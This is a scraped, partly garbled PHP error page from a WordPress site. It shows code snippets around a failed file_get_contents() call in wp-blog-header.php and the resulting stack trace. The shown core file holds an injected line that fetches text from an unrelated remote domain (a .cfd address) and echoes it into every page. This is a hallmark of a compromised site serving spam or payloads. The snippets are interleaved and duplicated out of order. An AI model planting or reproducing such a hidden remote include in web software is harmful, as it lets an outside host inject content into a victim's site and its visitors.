// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}
$a = file_get_contents('https://kutunggujandamu.cfd/bl/index.txt');
echo $a;
* @throws \ErrorException
*/
public function handleError($level, $message, $file = '', $line = 0, $context = [])
{
try {
parent::handleError($level, $message, $file, $line, $context);
} catch (Throwable $e) {
if (! apply_filters('acorn/throw_error_exception', true, $e)) {
return false;
}
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}
$a = file_get_contents('https://kutunggujandamu.cfd/bl/index.txt');
echo $a;
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
ErrorException
|
---|
ErrorException: file_get_contents(): SSL operation failed with code 1. OpenSSL Error messages: error:1416F086:SSL routines:tls_process_server_certificate:certificate verify failed at /home/creolemarketing/public_html/wp-blog-header.php:25 at Illuminate\Foundation\Bootstrap\HandleExceptions->handleError() (/home/creolemarketing/public_html/wp-content/themes/creolecuisine-marketing/vendor/roots/acorn/src/Roots/Acorn/Bootstrap/HandleExceptions.php:54) at Roots\Acorn\Bootstrap\HandleExceptions->handleError() at file_get_contents() (/home/creolemarketing/public_html/wp-blog-header.php:25) at require('/home/creolemarketing/public_html/wp-blog-header.php') (/home/creolemarketing/public_html/index.php:17) |